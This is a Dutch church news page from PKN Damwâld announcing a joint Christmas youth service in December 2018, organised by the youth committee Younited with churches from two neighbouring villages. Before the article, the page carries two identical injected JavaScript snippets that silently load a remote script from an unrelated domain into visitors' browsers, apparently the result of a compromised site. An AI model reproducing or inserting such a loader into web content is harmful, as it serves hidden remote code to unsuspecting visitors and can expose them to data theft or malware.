;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Younited organiseert een gezamelijke kerstjeugddienst met Broeksterwald en Driezum-Walterswald - PKN Damwâld

Younited organiseert een gezamelijke kerstjeugddienst met Broeksterwald en Driezum-Walterswald

Gepubliceerd op: vrijdag 23 november 2018

Kerst, het is weer bijna zover! En dat betekent gezellig met de familie samenzijn, veel eten, een grote kerstboom en heel veel lichtjes buiten aan het huis. En oh ja, ook nog de geboorte van Jezus vieren. Maar wat gebeurt er als alle romantiek van de kerst wordt afgeschaafd? Wat blijft er dan nog over…

‘KERST: als alle lichten zijn gedoofd’ is het thema van een jeugddienst die op zondag 16 december wordt gehouden in sporthal de Boppeslach in Damwâld. Een hele bijzondere dienst, want deze wordt gezamenlijk georganiseerd door kerken uit Broeksterwâld, Damwâld en Driezum-Wâlterswâld. Het is voor het eerst dat er zo groot en breed wordt samengewerkt door deze kerken aan een dienst.

Het initiatief komt van de jeugddienstcommissie Younited van de PKN Gereformeerd/Hervormde kerk te Damwâld. Al ruim tien jaar organiseren zij vier keer per jaar een jeugddienst in hun kerk. De laatste drie jaar werd er rond kerst een ‘kerstspecial’ opgevoerd, waarbij het kerstverhaal door middel van toneel, muziek en een korte preek wordt opgevoerd. Onder het publiek ook vele (jonge) kerkgangers uit de omliggende dorpen. Zo kwam het idee om de dienst dit jaar breder op te zetten en werd er contact gezocht met het jeugdwerk van de Gereformeerde Kerk Driezum-Wâlterswâld, Connected genaamd, en de Gereformeerde Kerk Broeksterwâld.

Resultaat is een interkerkelijke jeugddienst met drie verschillende voorgangers. Een bijzondere samenwerking vindt Younited-voorzitter Pier Reitsma: “Deze samenwerking tussen drie kerken, en dan met name van het jeugdwerk, is in deze regio uniek. Het is ontzettend mooi om te zien dat er vol energie en passie gewerkt wordt aan het jeugdwerk. De jeugdwerken van alle drie kerken is levend en actief.”

De muzikale begeleiding van de dienst wordt verzorgd door gospelband Sign uit Damwâld. Sprekers van de avond zijn Robert Colijn (PKN Damwâld), Alfons van Vliet (GK Broeksterwâld) en Leo Blees (GK Driezum-Wâlterswâld). De dienst begint om 19:30 uur. Toegang is gratis, maar er is wel een collecte voor de onkosten.

Foto's